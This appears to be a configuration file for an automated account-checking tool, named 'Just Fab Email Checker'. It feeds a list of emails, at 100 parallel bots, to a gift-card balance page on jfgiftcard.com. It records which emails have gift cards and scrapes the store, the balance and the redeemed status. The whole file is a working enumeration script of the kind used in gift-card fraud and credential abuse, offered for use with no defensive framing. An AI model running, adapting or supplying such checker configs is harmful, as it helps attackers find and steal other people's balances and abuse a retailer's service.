[SETTINGS]
{
  "Name": "Just Fab Email Checker",
  "SuggestedBots": 100,
  "LastModified": "2018-07-10T14:43:45.4003652+00:00",
  "AdditionalInfo": "",
  "Author": "Tunacan",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.jfgiftcard.com/index.cfm/main/giftcardInfo" AutoRedirect=TRUE 
  CONTENT "email=<USER>&giftcard=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Balance for gift cards associated with:" 
  KEYCHAIN Failure OR 
    KEY "Email was invalid" 
PARSE "<SOURCE>" LR "<tr>" "</td>
							<td>*" Recursive=FALSE -> CAP "Store" "" "" 
PARSE "<SOURCE>" LR "$" "
								
" Recursive=FALSE -> CAP "Balance" "" "" 
PARSE "<SOURCE>" LR "<br/>Redeemed:" "						" Recursive=FALSE -> CAP "REEDEMED" "" "" 
